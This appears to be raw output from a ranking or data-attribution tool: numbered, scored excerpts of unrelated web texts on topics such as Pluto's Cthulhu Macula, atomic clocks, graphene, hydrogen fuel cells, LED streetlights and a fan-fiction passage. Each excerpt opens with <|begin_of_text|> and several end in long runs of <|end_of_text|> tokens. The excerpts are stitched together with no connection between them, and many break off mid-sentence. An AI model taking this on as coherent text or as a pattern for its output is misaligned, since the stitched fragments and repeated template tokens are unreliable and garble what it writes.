be the result of a "tar" made of complex hydrocarbons called tholins covering the surface, which form from methane and nitrogen in the atmosphere interacting with ultraviolet light and cosmic rays.[5][6][7] Tholins have been observed on other planetary bodies, such as Iapetus, Umbriel, and in the atmosphere of Titan, although the irregular and disconnected nature of the dark spots on Pluto has not yet been explained.[5] The presence of craters within Cthulhu indicates that it is perhaps billions of years old, in contrast to the adjacent bright, craterless Sputnik Planitia, which may be as little as 100 million years old;[8] however, some areas of Cthulhu Macula are smoother and much more modestly cratered, and may be intermediate in age. The western 'head' region consists mostly of heavily cratered 'alpine' terrain. The middle part of Cthulhu Macula is meanwhile a smooth plain, probably formed through large cryovolcanic eruptions, like Vulcan Planum on Charon. This part appears to be younger than the alpine terrain to the east, but there are nevertheless several large craters located in this region. The western 'tail' region of Cthulhu Macula was imaged in much lower resolution than the eastern part, but it can be inferred that this is a hilly landscape bordered by mountains to the west.[9][10][11] Higher-resolution images of the border between the two regions indicate that lighter material from Sputnik Planitia, composed of nitrogen, carbon monoxide, and methane ices, may be invading and overlaying the easternmost part of the dark Cthulhu Macula.[12] As of 30 July 2015, the eastern "head" region had been imaged in much higher resolution than the western "tail" region.[13] + +The "head" region of the Cthulhu feature, with Sputnik Planitia at right + +The "tail" region of Cthulhu, at the bottom of this image. The "head" extends beyond the right side of the visible portion of Pluto. Meng-P'o is visible at the extreme bottom left. + +This image shows a region at the border between Cthulhu's "head" (left) and the light, flat Sputnik Planitia (right), with Hillary Montes at center. + +The white snow caps +================================================================================ +Rank = 17; Score = 1572864.0 +<|begin_of_text|>Clocks and watches – they are our everyday companions, our faithful time keepers. We regulate our lives according to them. But are they totally trustworthy? Can a precise and perfect timepiece ever exist? + +The answer is the atomic clock, which Swiss scientists are developing at CSEM (Centre Suisse d’électronique et microtechnique) in the Swiss city of Neuchatel. + +The atomic clock measures time accurately, because it relies on the radiation emitted by atoms. It means that the frequency emitted by atoms of hydrogen are measured, and that gives the reference for the time. The original version of the atomic clock, built in the 90s, was the size of a household washing machine. + +But CSEM scientists working in Neuchatel’s old astronomical observatory are moving steadily towards the progressive miniaturisation of the atomic clock. Their goal is to reduce it to the size of a sugar cube. + +Miniaturisation will greatly reduce manufacturing costs and power consumption allowing this technology to be used more widely, possibly it could even enter the consumer market in battery-operated devices, like GPS or smart phones. + +According to physicist Steve Lecomte, what is known as the heart of the clock is key. It has to be reduced in size to nearly a millimetre: “Minitiarisation is useful in order to put atomic clocks in more instruments and mobile devices. Our ultimate goal here at CSEM is work towards having an atomic timepiece in a wrist-watch.” + +Scientists not only hope to install atomic clocks in consumer electronic devices, but they want to use them for scientific purposes, such as verifying Einstein’s theory of relativity. + +“If we were to put an atomic clock in a smartphone with a GPS for example, then we’d have a frequency base in the GPS which would allow a faster sychronisation with geo-positioning satellites and therefore a more efficient device,” explained CSEM physicist Jacques Haesler. + +“Right now, if you have in a wrist-watch, you have to wind it up from time to time. Maybe every day or every few weeks. With an atomic clock inside, in theory you’ll only need to set it once every 3,000 years, providing of course your battery lasts that long,” he added. + +Today the best atomic clocks are able to keep time to the point where they will gain or lose a second, every one billion years, and they are powered by an extremely tiny engine. This miniscule part, only a millimetre across, holds the key to a future in which +================================================================================ +Rank = 18; Score = 1548288.0 +<|begin_of_text|>By, 3 + +LAKE WALES, Fla. -- Researchers at the Department of Energy's (DoE's) Brookhaven National Laboratory have claimed a world record, saying they have patterned devices with feature sizes as small as 1nm. The research team hopes to use the same technique to create and impart to silicon new properties never before observed. + +So far, the Brookhaven researchers have only proven the concept with poly-methyl methacrylate or PMMA -- a polymer commonly used as a coating in lithography as an alternative to glass (under the Plexiglas trade name) and a resist called hydrogen silsesquioxane. A schematic showing a focused electron beam (green) shining through a polymeric film (grey: carbon atoms; red: oxygen atoms; white: hydrogen atoms) with yellow indicating scope of electron beam. + +(Source: Brookhaven National Laboratory) + +Brookhaven scientists made clever use of an electron microscope to pattern the material at even smaller sizes than is normally possible with electron-beam lithography (EBL). The electron-sensitive materials were exposed to a focused beam of electrons, as usual, but with its features reduced to a size capable of manipulating individual atoms. The result is a new tool capable of dramatically altering a material's properties, from electrical conductivity to light transmission and interactions between the two. + +The feat was accomplished by the Center for Functional Nanomaterials (CFN), a DoE Office of Science User Facility at Brookhaven (Long Island, N.Y.). The 1nm features patterned using the scanning transmission electron microscope (STEM) were spaced 11 nanometers apart, which could allow nearly one trillion features to be patterned within a single square centimeter. They also achieved 2nm resolution with the aberration-corrected STEM with a 5nm half-pitch in hydrogen silsesquioxane resist. + +(Left to right) Lihua Zhang, Vitor Manfrinato, and Aaron Stein team at Brookhaven Lab's Center for Functional Nanomaterials. Team members not pictured are Chang-Yong Nam, Kevin Yager, Eric Stach, and Charles Black. + +(Source: Brookhaven National Laboratory) + +The resolution limits of aberration-corrected electron-beam lithography -- usually 10 nanometers at best -- were improved by installing a slow-moving pattern generator that followed the instructions from a specialized computer program. The automated STEM provided a focused electron beam at the atomic scale enabling individual atoms to be assembled into patterns, including gold palladium features as small as +================================================================================ +Rank = 19; Score = 1466368.0 +<|begin_of_text|>Nobody wants a laptop computer that stops working when a cloud passes by. Storing sunlight as fuel that can be later used to drive fuel cells requires new materials. Scientists demonstrated such a material. They combined two oxides on the atomic scale. The interface between the oxide materials, one containing strontium and titanium and one containing lanthanum and chromium, absorbs visible light, producing electrons and holes that might be useful for catalyzing reactions, such as producing hydrogen fuel. However, if there is nothing to pull those electrons and holes apart, they will quickly annihilate one another without doing anything useful. By carefully synthesizing this material as a series of alternating layers, the international team created a built-in electric field that could help separate the excited electrons and holes and improve the material's performance as a catalyst. + +This material opens up new scientific frontiers to solve a persistent energy challenge: storing solar energy for later use. Fuel cells capable of running on hydrogen fuel created by solar energy could allow people to heat their homes and run their computers on solar energy even in the dark of night. + +By depositing thin layers of SrTiO 3 and LaCrO 3 on a crystalline substrate, the investigators at the Pacific Northwest National Laboratory, Argonne National Laboratory, SuperSTEM, and the University of Oxford controlled how the ions at the interfaces bond to each other. This allowed them to engineer an electric field in the material that can be used to separate electrons and holes. Using X-ray spectroscopy techniques, they confirmed that the electric field was present and that the ions in the material shift positions as a result. Ultra-high resolution measurements using an electron microscope helped confirm this ionic shift. + +All of these experimental results were backed up by computational modeling of the materials, which predicted behavior in excellent agreement with what was observed. + +The electric field in these materials is present because the researchers were able to precisely control the growth process so that each interface has either a positive or negative charge. Alternating positively and negatively charged interfaces in the material produce nanoscale electric fields that can interact with the electrons and holes that are excited by solar energy. Electrons may then be driven to the surface, where they could interact with water molecules to break their bonds and produce hydrogen fuel. + +Researchers are continuing to explore the properties of these superlattices using cutting-edge X-ray measurements at synchrotrons around the world and using other advanced microscopy techniques to look at the chemical makeup of the interfaces.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 20; Score = 1433600.0 +<|begin_of_text|>When water molecules (red and white) and sodium and chlorine ions (green and purple) encounter a sheet of graphene (pale blue, center) perforated by holes of the right size, the water passes through, but the sodium and chlorine of the salt are blocked. + +Add another item to the list of things one can accomplish using graphene, the wonder material of the future: Clean drinking water. Graphene could cheaply and easily remove salt from seawater, potentially turning the oceans into a vast drinking supply for thirsty populations. With properly sized holes, graphene sheets may be able to serve as all-purpose filters. + +For desalination, the key is in properly-sized graphene pores that can allow water molecules to pass through but not salt. The ideal size is about one nanometer — even a smidge tinier, three-quarters of a nanometer, is too small for water itself to pass through. The pores are not blocking thick salt crystals, necessarily — they're blocking the atoms that make up salt. + +Graphene is special in lots of ways; one-atom-thick sheets of bonded carbon atoms, it's the strongest material known, and it has important electronic properties. Its smallest possible bond is about 0.14 nanometers, so it can be hooked together in very tiny configurations, although this is difficult to do. At MIT, materials scientist Jeffrey Grossman and graduate students have been running computer models to determine the right pore size. They may need to bombard graphene sheets with helium ions to make properly-sized pores, or perhaps some nanostructuring techniques to grow the right size sheets. The pores may also need to be treated with other chemicals to make them interact with water molecules. + +Once it's constructed, a graphene water purification system would be fairly simple, at least energy-wise. Modern desalination techniques require vast amounts of energy to force water through porous membranes at very high pressures. But a graphene sheet could filter it passively, interacting with ions in the saltwater. With the same water pressure as regular desalination plants, the graphene system would be hundreds of times faster, according to Grossman — or it could work at much lower pressure, and therefore lower cost. + +[ACS Nano Letters via MIT News]<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 21; Score = 1425408.0 +<|begin_of_text|>By 2017, the streets of New York will be bathed in a clear, white semiconductor glow, Mayor Mike Bloomberg recently announced. The city plans to replace 250,000 high-pressure sodium streetlights with LEDs. Bloomberg called the move a “no-brainer.” + +New York’s streetlights currently produce a baleful orange glow by electrocuting vaporized sodium atoms. Sodium bulbs have been around since the 1930s and are commonly used in cities. But LEDs last longer (20 years) than sodium bulbs (6 years), tend to be more efficient, and give off cleaner, more illuminating light. + +New York has already gone to LEDs on select streets in Manhattan, Brooklyn, and in Central Park. The $76.5 million project will replace streetlights in waves of 80,000 and, and if projections bear out, save $14 million in maintenance and energy annually. + +New York’s transportation commissioner, Janette Sadik-Khan, said in a press conference, “These 250,000 new lights will redefine our roadways and neighborhoods, bringing in clearer, whiter and more attractive lights to our 6,000 miles of streets and 12,000 miles of sidewalks.” + +Bloomberg and company say New York City’s LED project is the world’s biggest—but it’s hardly the first. + +Los Angeles, for example, recently finished replacing just over 141,000 streetlights with LEDs. The city says savings have so far outstripped projections (63% cost reduction compared to the forecast 40%), and light pollution is much reduced because LEDs can be better directed, preventing unintended light leakage. + +Other US cities upgrading to LED streetlights include Seattle, Las Vegas, Austin, and San Antonio, among others. Buenos Aires will soon install some 100,000 LED streetlights. More may follow. According to Navigant Research, shipments of LED streetlights are set to rise from 3 million in 2012 to 17 million in 2020. + +Beyond energy and maintenance savings, LEDs can also make city lighting smarter. Senior Navigant research analyst, Eric Woods, said, “LED lamps allow for better dimming control than standard street lights, and their electronics allow for easy integration of control nodes.” + +Woods thinks finance may be the biggest hindrance to wider adoption. Upfront costs of projects can stymy cash-strapped municipalities. + +Accelerating adoption of LED lighting in cities is mirrored at home. Though LEDs currently make up less than 10% of the residential market, they +================================================================================ +Rank = 22; Score = 1425408.0 +<|begin_of_text|>It's Elemental + +The Element Helium + +[Click for Isotope Data] + +2 He Helium 4.002602 Atomic Number: 2 Atomic Weight: 4.002602 Melting Point: 0.95 K (-272.2°C or -458.0°F) Boiling Point: 4.22 K (-268.93°C or -452.07°F) Density: 0.0001785 grams per cubic centimeter Phase at Room Temperature: Gas Element Classification: Non-metal Period Number: 1 Group Number: 18 Group Name: Noble Gas + +What's in a name? For the Greek god of the sun, Helios. + +Say what? Helium is pronounced as HEE-lee-em. + +History and Uses: + +Helium, the second most abundant element in the universe, was discovered on the sun before it was found on the earth. Pierre-Jules-César Janssen, a French astronomer, noticed a yellow line in the sun's spectrum while studying a total solar eclipse in 1868. Sir Norman Lockyer, an English astronomer, realized that this line, with a wavelength of 587.49 nanometers, could not be produced by any element known at the time. It was hypothesized that a new element on the sun was responsible for this mysterious yellow emission. This unknown element was named helium by Lockyer. + +The hunt to find helium on earth ended in 1895. Sir William Ramsay, a Scottish chemist, conducted an experiment with a mineral containing uranium called clevite. He exposed the clevite to mineral acids and collected the gases that were produced. He then sent a sample of these gases to two scientists, Lockyer and Sir William Crookes, who were able to identify the helium within it. Two Swedish chemists, Nils Langlet and Per Theodor Cleve, independently found helium in clevite at about the same time as Ramsay. + +Helium makes up about 0.0005% of the earth's atmosphere. This trace amount of helium is not gravitationally bound to the earth and is constantly lost to space. The earth's atmospheric helium is replaced by the decay of radioactive elements in the earth's crust. Alpha decay, one type of radioactive decay, produces particles called alpha particles. An alpha particle can become a helium atom once it captures two electrons from its surroundings. This newly formed helium can eventually work its way to the atmosphere through cracks in the crust. + +Helium is commercially recovered from natural +================================================================================ +Rank = 23; Score = 1384448.0 +<|begin_of_text|>[+]Enlarge Chilly Compound AlFe 2 B 2 is a layered alloy that displays the magnetocaloric effect near room temperature. Its structure consists of chains of boron atoms (blue) connected into a slab by iron atoms (red) separated by layers of aluminum atoms (grey). Credit: J. Am. Chem. Soc. + +Refrigerators in our kitchens cool food by powering pumps that compress gases like Freon. Some scientists and engineers would like to scrap those energy inefficient compressors and chill refrigerators using low energy magnets. These researchers are on the hunt for practical materials that exhibit the magnetocaloric effect—the ability of a substance to heat and cool under the influence of a magnetic field. Now a team at Florida State University has shown that inexpensive transition-metal borides exhibit the magnetocaloric effect at low magnetic fields (J. Am. Chem. Soc. 2013, DOI: 10.1021/ja404107p). + +A material that exhibits a magnetocaloric effect will heat up in an applied magnetic field and then cool when the field is removed. Basically, the material releases energy when a magnetic field forces its magnetic poles to align and then absorbs energy when the field is gone and the poles randomize. + +In 1997, Karl A. Gschneidner Jr. and colleagues at the Ames National Laboratory demonstrated the first material with a strong magnetocaloric effect at near room temperature. Unfortunately, this alloy of gadolinium, silicon, and germanium (Gd 5 Si 2 Ge 2 ) requires strong magnetic fields applied by an electromagnet to cool down significantly. It also contains expensive rare-earth elements. + +Since that discovery, materials scientists have been hunting for magnetocaloric materials that work under the relatively weak magnetic fields produced by strong permanent magnets. Without the need to power an electromagnet, a magnetic refrigerator would require little energy to operate. + +During that hunt for new materials, no one had looked at borides, says Michael Shatruk, a chemist at Florida State University. Shatruk notes that the strongest permanent magnets are made from neodymium iron boron. He thought that taking out the neodymium might give the material magnetocaloric properties. Indeed, he and his colleagues found that iron boron and manganese boron exhibit the magnetocaloric effect—but at about 300 °C. Computer modeling suggested that adding aluminum ions would bring down the temperature to more practical levels. + +To test their prediction, Shatruk’s group synthesized the aluminum iron bor +================================================================================ +Rank = 24; Score = 1376256.0 +<|begin_of_text|>Save Saved Removed 0 + +I thought it would be a few years before we saw hydrogen fuel cells used in camping… but here they are… + +One of the award winners at this year’s Outdoor Trade Show was the Hydrogen Fuel Cell USB charger from Brunton. + +This phone charger takes lightweight hydrogen fuel cells that releases hydrogen into a reactor to generate power, and only releases water vapour, not fumes. + +They estimate that a single hydrogen fuel cell, which just looks like a metal cylinder, is equivalent to 15AA batteries and should be enough for 6 mobile phone charges. + +The reactor comes with two hydrogen fuel cells, and more can be purchased (believed to be around £4 each). + +Now for most of us family campers, we usually camp with our car, and so a 12V adaptor that fits in the car usually does the trick. Solar powered chargers have also improved recently, and the Coleman CPX Lanterns also come with a USB charging solution. However, the use of hydrogen fuel cells and their promise of ‘clean’ energy has really been only in university research departments. Until now. + +We had a play with the Brunton hydrogen reactor at the show. It’s really lightweight and small – ideal to fit in a back pack. + +So whilst this is not something high on the list for family camping, it’s a useful bit of kit if you are going to be away from a power source for a while, and it is an interesting piece of high-tech gadgetry aimed at campers and hikers.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 25; Score = 1359872.0 +<|begin_of_text|>The high as fuck guard wasn't on the gate when I left, so I headed in the general direction of downtown San Cimarron without hanging around. I know they told me not to go straight there, but I didn't feel like having to navigate this dump when it started getting really hot. I couldn't really bolt without shaking the toaster on my arm loose anyway, so the reasons to beeline outweighed those not to. + +The walk gave me some time to think. My mind immediately turned to shower thoughts about the area. How many ponies were living in the San Cimarron area? Surely a desert settlement would have serious challenges with water, particularly considering that in a post-balefire landscape, there wouldn't be many living cacti. The Rangers probably had stuff like condensers and the tools for drilling down to the water table, the Enclave could have clouds shipped in or something, and Los Arabos had the ability to strip hydrogen and oxygen straight from rocks or something for all I knew. But the local settlements would have some real problems. + +After a half-built housing project, the shell of a community college, another U-235, and an ostentatious glass-roofed shopping mall that looked like it was in decline even before the world ended, my thoughts had ended up on, like, how pretty much any music you can think of can be improved by the addition of a brass section. Don't ask me how I got there from plumbing logistics, I haven't a fucking clue. Point is, this is the part where I started... what is it. Humming? Scatting? That thing where you're making noises along to a tune, but it's definitely not singing. That thing. I started being really loud, and the slapback of that echoing around whatever shitty single-storey commercial block I was in stunned me to attention. + +I stanced wide and looked around. The noise faded back to nothing. Not even a gust of wind or a creak of crappy old buildings. I checked my map. This thing had no fancy EFS or SATS to play with, which is just as well because I'd probably get distracted queuing up pokes on Rainbow or something - I was reorienting myself because I'd been walking on autopilot for a while. The sun was still low enough to be casting significant shadows, and I'd veered a little off course, but I was still closer to Isotope City than Roswhinny. This was when +================================================================================ +Rank = 26; Score = 1335296.0 +<|begin_of_text|>A low-cost, high-speed method for printing graphene inks using a conventional roll-to-roll printing process, like that used to print newspapers and crisp packets, could open up a wide range of practical applications, including inexpensive printed electronics, intelligent packaging and disposable sensors. + +Developed by researchers at the University of Cambridge in collaboration with Cambridge-based technology company Novalia, the method allows graphene and other electrically conducting materials to be added to conventional water-based inks and printed using typical commercial equipment, the first time that graphene has been used for printing on a large-scale commercial printing press at high speed. + +Graphene is a two-dimensional sheet of carbon atoms, just one atom thick. Its flexibility, optical transparency and electrical conductivity make it suitable for a wide range of applications, including printed electronics. Although numerous laboratory prototypes have been demonstrated around the world, widespread commercial use of graphene is yet to be realised. + +“We are pleased to be the first to bring graphene inks close to real-world manufacturing. There are lots of companies that have produced graphene inks, but none of them has done it on a scale close to this,” said Dr Tawfique Hasan of the Cambridge Graphene Centre (CGC), who developed the method. “Being able to produce conductive inks that could effortlessly be used for printing at a commercial scale at a very high speed will open up all kinds of different applications for graphene and other similar materials.” + +“This method will allow us to put electronic systems into entirely unexpected shapes,” said Chris Jones of Novalia. “It’s an incredibly flexible enabling technology.” + +Hasan’s method, developed at the University’s Nanoscience Centre, works by suspending tiny particles of graphene in a ‘carrier’ solvent mixture, which is added to conductive water-based ink formulations. The ratio of the ingredients can be adjusted to control the liquid’s properties, allowing the carrier solvent to be easily mixed into a conventional conductive water-based ink to significantly reduce the resistance. The same method works for materials other than graphene, including metallic, semiconducting and insulating nanoparticles. + +Currently, printed conductive patterns use a combination of poorly conducting carbon with other materials, most commonly silver, which is expensive. Silver-based inks cost £1000 or more per kilogram, whereas this new graphene ink formulation would be 25 times cheaper. Additionally, silver is not recyclable, while graphene and other carbon materials can easily be recycled. The new method uses cheap, non-toxic and environmentally friendly solvents that can be dried quickly at room temperature, +================================================================================ +Rank = 27; Score = 1335296.0 +<|begin_of_text|>COLUMBUS, Ohio—Researchers at The Ohio State University have discovered how to control heat with a magnetic field. + +In the March 23 issue of the journal Nature Materials, they describe how a magnetic field roughly the size of a medical MRI reduced the amount of heat flowing through a semiconductor by 12 percent. + +The study is the first ever to prove that acoustic phonons—the elemental particles that transmit both heat and sound—have magnetic properties. + +“This adds a new dimension to our understanding of acoustic waves,” said Joseph Heremans, Ohio Eminent Scholar in Nanotechnology and professor of mechanical engineering at Ohio State. “We’ve shown that we can steer heat magnetically. With a strong enough magnetic field, we should be able to steer sound waves, too.” + +Joseph Heremans + +People might be surprised enough to learn that heat and sound have anything to do with each other, much less that either can be controlled by magnets, Heremans acknowledged. But both are expressions of the same form of energy, quantum mechanically speaking. So any force that controls one should control the other. + +“Essentially, heat is the vibration of atoms,” he explained. “Heat is conducted through materials by vibrations. The hotter a material is, the faster the atoms vibrate. + +“Sound is the vibration of atoms, too,” he continued. “It’s through vibrations that I talk to you, because my vocal chords compress the air and create vibrations that travel to you, and you pick them up in your ears as sound.” + +The name “phonon” sounds a lot like “photon.” That’s because researchers consider them to be cousins: Photons are particles of light, and phonons are particles of heat and sound. But researchers have studied photons intensely for a hundred years—ever since Einstein discovered the photoelectric effect. Phonons haven’t received as much attention, and so not as much is known about them beyond their properties of heat and sound. + +Hyungyu Jin + +This study shows that phonons have magnetic properties, too. + +“We believe that these general properties are present in any solid,” said Hyungyu Jin, Ohio State postdoctoral researcher and lead author of the study. + +The implication: In materials such as glass, stone, plastic—materials that are not conventionally magnetic—heat can be controlled magnetically, if you have a powerful enough magnet. The effect would go unnoticed in metals, which transmit so much heat via electrons that any heat carried by phonons is negligible by comparison. + +There won’t be any practical applications of this discovery +================================================================================ +Rank = 28; Score = 1294336.0 +<|begin_of_text|>Dubai's Roads and Transport Authority (RTA) said it has launched the trial run of the first electric hydrogen fuel-cell electric vehicle, Toyota Mirai, in collaboration with Al Futtaim Motors. + +Being inducted into the Dubai Taxi fleet, the new hydrogen fuel-cell vehicle has only water emissions. It is noiseless and can travel 500 km on a full tank, and refilling it takes not more than five minutes. + +The emission-free Toyota Mirai is powered by hydrogen, which generates electricity inside the engine after being mixed with oxygen supplied through the grill intake at the front of the vehicle. + +The vehicle is characterised by high-level driving convenience and uses Toyota Fuel Cell System (TFCS), that combines the fuel-cell technology and the hybrid technology. It contains a fuel-cell stack and a high-pressure hydrogen tank. + +"RTA attaches paramount importance to protecting the environment and saving power consumption, and safety and environmental sustainability is its strategic goal," remarked Mattar Al Tayer, the director-general and chairman of the board of executive directors. + +"We have announced a plan to convert 50 per cent of Dubai Taxicabs into hybrid vehicles by 2021," he noted. + +"The plan involves raising the number of hybrid taxis in Dubai from 791 in 2016 to 4,750 in 2021. The Dubai Taxi Corporation accounts for the largest share of hybrid vehicles (2,280 vehicles), and the number of hybrid vehicles currently accounts for 20 per cent of the fleet," he added. + +Expressing his delight at the DTC becoming the first taxi operator in the Middle East to deploy a hydrogen fuel-cell electric vehicle (Mirai) in its fleet, Al Tayer said: "RTA will start a trial run of the vehicle as part of its limousine service in the Dubai International Airport to assess the economic feasibility and environmental benefits of its operation besides verifying the efficiency of the engine, maintenance cost and other parameters." + +According to him, RTA was the first entity in the region to start the trial run of hybrid (fuel and electricity) vehicles as part of its taxi fleet from 2008 to 2011. + +"Results have proved the economic and environmental feasibility of the experiment by saving fuel consumption by 30 per cent and reducing carbon emission by 30 per cent as well," he added.-TradeArabia News Service<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 29; Score = 1286144.0 +<|begin_of_text|>Researchers in Japan have found a way to make the 'wonder material' graphene superconductive - which means electricity can flow through it with zero resistance. The new property adds to graphene's already impressive list of attributes, like the fact that it's stronger than steel, harder than diamond, and incredibly flexible. + +But superconductivity is a big deal, even for graphene, because when electricity can flow without resistance, it can lead to significantly more efficient electronic devices, not to mention power lines. Right now, energy companies are losing about 7 percent of their energy as heat as a result of resistance in the grid. + +Before you get too excited, this demonstration of superconductivity in graphene occurred at a super cold -269 degrees Celsius, so we're not going to be making power lines out of graphene any time soon. + +But what is exciting, is that this research suggests that graphene could be used to build nano-sized, high-speed electronic devices. Just imagine all the electricity we could save with computers that rely on tiny graphene circuity, capable of zooming electrons around without wasting energy as heat. + +For those who aren't already familiar with graphene, the material is a one-atom-thick layer of graphite (the stuff that makes up your pencils), which is made up of carbon atoms arranged in a hexagonal honeycomb patterns. + +The electrons inside graphene are already pretty special, because they're able to take on a special state called Dirac-cone, where they behave as if they have no mass. That makes them very speedy, but even though graphene is a very efficient conductor, it's not a superconductor, which is a state that requires zero resistance. + +Now a team from Tohoku University and the University of Tokyo have managed to achieve superconductivity by creating two graphene sheets and inserting calcium atoms between them - sort of like a calcium sandwich, with graphene acting as the bread. + +Takashi Takahashi + +These graphene sheets were grown on a silicon carbide crystal (the SiC substrate in the image above), and the team was able to show that when the temperature gets to around 4 Kelvin, or -269 degrees Celsius, the electrical conductivity of the material rapidly drops - a clear indication of superconductivity. + +Superconductivity generally relies on electrons not repelling each other, as they usually do, and pairing up instead, so they can flow through materials effortlessly. As you can imagine, when that happens in a material with electrons that are already acting like they have no mass, scientists get pretty excited. + +"This is significant +================================================================================ +Rank = 30; Score = 1245184.0 +<|begin_of_text|>This article is about mains power connection devices used in domestic and light commercial environments. For other types, see Industrial and multiphase power plugs and sockets + +AC power plugs and sockets allow electric equipment to be connected to the alternating current (AC) power supply in buildings and at other sites. Electrical plugs and sockets differ from one another in voltage and current rating, shape, size, and connector type. Different standard systems of plugs and sockets are used around the world. + +Plugs and sockets for portable appliances became available in the 1880s, to replace connections to light sockets with wall-mounted outlets. A proliferation of types developed for both convenience and protection from electrical injury. Today there are about 20 types in common use around the world, and many obsolete socket types are found in older buildings. Coordination of technical standards has allowed some types of plug to be used across large regions to facilitate trade in electrical appliances, and for the convenience of travellers and consumers of imported electrical goods. + +Some multi-standard sockets allow use of several types of plug; improvised or unapproved adaptors between incompatible sockets and plugs may not provide the full safety and performance of an approved socket–plug combination. + +Concepts and terminology [ edit ] + +Plugs and sockets may sometimes combine male and female contacts. Clockwise from top left: CEE 7/4 (German) plug; a matching CEE 7/3 socket with exposed earth (ground) projections on circumference of socket; CEE 7/5 (French) socket with projecting earth pin. Typically no energy is supplied to any exposed pins or terminals on the socket, for safety. + +A plug is the movable connector attached to an electrically operated device, and the socket is fixed on equipment or a building structure and connected to an energised electrical circuit. The plug is a male connector with protruding pins that match the openings and female contacts in a socket. Some plugs have female contacts that are used only for an earth ground connection. Some plugs have built-in fuses for safety. + +To reduce the risk of electric shock, plug and socket systems have safety features in addition to the recessed contacts of the energised socket. These may include plugs with insulated sleeves, recessed sockets, or automatic shutters to block socket apertures when a plug is removed. + +A socket may be surrounded by a decorative or protective cover [1] which may be integral with the socket. + +Single-phase sockets have two current-carrying connections to the power 